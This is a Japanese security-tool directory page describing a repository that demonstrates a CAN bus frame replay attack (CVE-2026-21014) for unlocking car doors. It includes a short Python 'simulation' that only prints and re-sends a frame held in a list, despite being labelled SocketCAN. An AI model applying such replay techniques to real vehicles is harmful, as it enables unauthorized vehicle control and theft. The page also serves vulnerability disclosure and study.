Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21014-CAN-Bus-Frame-Replay-Attack-on-Automotive-ECU — キャプチャされたCANバスフレームをリプレイしてCVE-2026-21014を実証し、認証とフレッシュネスチェックの欠如により不正な自動車ECU動作が可能になることを示します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21014-can-bus-frame-replay-attack-on-automotive-ecu
組み込みシステムセキュリティ脆弱性分析エクスプロイトペネトレーションテストハードウェアセキュリティ
GitHubgeorge0papasotiriou/cve-2026-21014-can-bus-frame-replay-attack-on-automotive-ecu

CVE-2026-21014-CAN-Bus-Frame-Replay-Attack-on-Automotive-ECU

キャプチャされたCANバスフレームをリプレイしてCVE-2026-21014を実証し、認証とフレッシュネスチェックの欠如により不正な自動車ECU動作が可能になることを示します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
17日前未レビュー

CVE-2026-21014 – 自動車ECUに対するCANバスフレームリプレイ攻撃

プログラムコード(Python SocketCANシミュレーション)

root@kitploit:~
# can_replay_sim.py - Simulates CAN bus replay
import time

can_messages = []

def send_can(msg_id, data):
    print(f"CAN {msg_id:#x}: {data.hex()}")
    can_messages.append((msg_id, data))

def receive_can():
    return can_messages[-1] if can_messages else None

# Simulate car sending "door unlock" command
send_can(0x100, b'\x01\x00\x00\x00')  # unlock

# Attacker replays captured frame
time.sleep(1)
captured = receive_can()
if captured:
    print("Replaying captured frame...")
    send_can(captured[0], captured[1])

CVE-2026-21014 – 自動車ECUに対するCANバスフレームリプレイ攻撃

Severity: High

概要

自動車のController Area Network(CAN)は、メッセージ認証やフレッシュネスチェックを実装していません。OBD‑IIポートに物理的にアクセスできる攻撃者は、正当なフレーム(例:ドアロック解除)をキャプチャし、後でそれをリプレイすることで不正な操作を行うことができます。

脆弱性の詳細

  • タイプ: リプレイ攻撃
  • 影響: 車両の不正制御。
  • 根本原因: CANプロトコルには本質的なセキュリティがなく、メッセージにタイムスタンプ、カウンタ、MACがありません。

エクスプロイトのデモンストレーション

シミュレーションを実行します:

root@kitploit:~
python can_replay_sim.py

このスクリプトは、ドアロック解除コマンドのキャプチャとリプレイを出力します。

ツールをダウンロード